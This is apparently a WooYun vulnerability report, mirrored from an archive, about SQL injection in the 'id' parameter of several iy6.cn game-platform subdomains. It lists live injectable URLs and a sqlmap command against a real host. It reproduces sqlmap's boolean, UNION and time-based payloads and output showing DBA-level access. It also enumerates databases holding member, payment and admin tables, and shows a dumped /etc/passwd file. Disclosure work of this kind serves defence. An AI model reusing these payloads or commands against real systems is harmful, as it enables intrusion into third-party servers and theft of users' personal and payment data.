乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-16: 厂商已经主动忽略漏洞,细节向公众公开
同样的参数存在注入!~~~
注入点如:
http://zxy.iy6.cn/?action=detail&id=85http://jjsg.iy6.cn/?action=detail&id=4825http://xyfm.iy6.cn/?action=detail&id=2935http://wj.iy6.cn/?action=detail&id=3581http://rxhzw.iy6.cn/?action=detail&id=26http://wj2.iy6.cn/?action=detail&id=3226http://smsg.iy6.cn/?action=detail&id=2946http://xyfm.iy6.cn/?action=detail&id=2935……
等等还有很多,以第一个为例http://zxy.iy6.cn/?action=detail&id=85sqlmap测试
sqlmap.py -u "http://zxy.iy6.cn/?action=detail&id=85" --dbms "MySQL" --current-db --current-user --is-dba --hostname
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=detail&id=85) AND 9543=9543 AND (7966=7966 Type: UNION query Title: MySQL UNION query (NULL) - 20 columns Payload: action=detail&id=-8903) UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71776a6971,0x484e58444e4164536669,0x7167737171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: action=detail&id=85) AND SLEEP(5) AND (3740=3740---[19:50:14] [INFO] testing MySQL[19:50:14] [INFO] confirming MySQL[19:50:14] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.0[19:50:14] [INFO] fetching current usercurrent user: 'root@localhost'[19:50:15] [INFO] fetching current databasecurrent database: 'iy6'[19:50:15] [INFO] fetching server hostnamehostname: 'localhost.localdomain'[19:50:15] [INFO] testing if current user is DBA[19:50:15] [INFO] fetching current usercurrent user is DBA: Truedatabase management system users [6]:[*] ''@'localhost.localdomain'[*] 'root'@'%'[*] 'root'@'127.0.0.1'[*] 'root'@'c65mini.localdomain'[*] 'root'@'localhost'[*] 'root'@'localhost.localdomain'available databases [7]:[*] information_schema[*] iy6[*] mysql[*] performance_schema[*] qihihi[*] qq990test[*] testDatabase: qq990test+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| kmy_member | 527473 | 50多万用户| kmy_member_login_game_record | 106896 | 10多万登录记录| kmy_z_game_card | 48793 | 几万游戏卡| kmy_z_card_record | 32676 || kmy_operationlog | 9329 || kmy_game_charge_record | 5497 || kmy_game_server | 5235 || kmy_pay_record | 4916 | 几千付款记录| kmy_news | 3359 || kmy_platform_money_record | 3060 || kmy_access | 1582 || kmy_kaifu | 1263 || kmy_loginlog | 798 | 登陆记录| kmy_menu | 635 || kmy_fail_charge | 336 || kmy_member_copy | 204 || kmy_game_charge_retry | 201 || kmy_z_card_type | 199 || kmy_z_charge_record | 131 || kmy_z_charge_username | 130 || kmy_tg_link | 121 || kmy_findpwd_record | 86 | 找回密码记录| kmy_game_pic | 77 || kmy_game | 67 || kmy_game_leftmenu | 47 || kmy_friend_link | 33 || kmy_pay_type | 23 || kmy_faq | 22 || kmy_user | 15 | 管理用户| kmy_pic | 13 || kmy_cache | 9 || kmy_single_page | 8 || kmy_role | 6 || kmy_tg_member | 4 | 推广成员| kmy_notification | 2 || kmy_config | 1 |+---------------------------------+---------+Database: iy6+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| kmy_z_game_card | 66960 | 六万游戏卡| kmy_member_login_game_record | 31457 || kmy_member | 19818 | 将近两万用户| kmy_operationlog | 17571 || kmy_pay_record | 14445 | 一万多付款记录| kmy_game_charge_record | 9640 || kmy_z_card_record | 6665 || kmy_news | 4562 || kmy_game_server | 4298 || kmy_kaifu | 3927 || kmy_platform_money_record | 2939 || kmy_member_server_rolename | 2741 || kmy_access | 1825 || kmy_z_charge_username | 1722 || kmy_z_charge_record | 1525 || kmy_loginlog | 1374 | 登陆记录| kmy_menu | 849 || kmy_tg_link | 628 || kmy_game_pic | 193 || kmy_z_card_type | 135 || kmy_game | 94 || kmy_game_leftmenu | 81 || kmy_findpwd_record | 51 || kmy_friend_link | 51 || kmy_game_charge_retry | 44 || kmy_tg_memberlink_change_record | 41 || kmy_tg_member | 32 | 推广用户| kmy_faq | 21 || kmy_pay_type | 19 || kmy_user | 18 | 管理用户| kmy_pic | 13 || kmy_cache | 9 || kmy_single_page | 8 || kmy_role | 5 || kmy_notification | 2 || kmy_config | 1 |+---------------------------------+---------+Database: qihihi+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| pre_userplaygamelog | 1393154 | 一百多万用户记录| pre_z_game_card | 112471 | 十几万游戏卡| pre_user | 81905 | 八万多用户| pre_userpingtaibilog | 37335 | 三万多平台币记录| pre_card | 25281 || pre_payorder | 23073 || pre_longnews | 12900 || pre_gameserver | 7435 || pre_kaifubiao | 6651 || pre_news | 6149 || pre_z_fail_charge | 5214 || pre_log | 3687 || pre_longplus | 2657 || pre_usergetpwdlog | 1361 || pre_paytoolog | 1209 || pre_z_charge_username | 513 || pre_z_charge_record | 496 || pre_longnewstype | 375 || pre_z_card_type | 233 || pre_longplustype | 205 || pre_game | 93 || pre_plus | 32 || pre_longplustype_copy | 29 || pre_role_user | 24 | | pre_paytype | 22 | | pre_link | 21 || pre_node | 16 || pre_adminuser | 13 | 管理员用户| pre_access | 11 || pre_plustype | 9 || pre_userpingtaibilogtype | 6 || pre_adminaddpingtaibilog | 5 || pre_gameserverstatus | 5 || pre_ads | 4 || pre_role | 4 || pre_cpsurl | 3 | ?| pre_newstype | 2 || pre_adstype | 1 || pre_cpsuser | 1 | 超级管理员?| pre_linktype | 1 |+---------------------------------+---------+Database: mysql+---------------------------------+---------+| Table | Entries |+---------------------------------+---------+| help_relation | 1092 || help_topic | 535 || help_keyword | 487 || help_category | 40 || `user` | 6 || db | 2 || proxies_priv | 2 |+---------------------------------+---------+
读取任意文件/etc/passwd
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinsaslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinnginx:x:498:499::/home/nginx:/bin/bashmysql:x:500:500::/home/mysql:/sbin/nologin
过滤权限限制
未能联系到厂商或者厂商积极拒绝
漏洞Rank:20 (WooYun评价)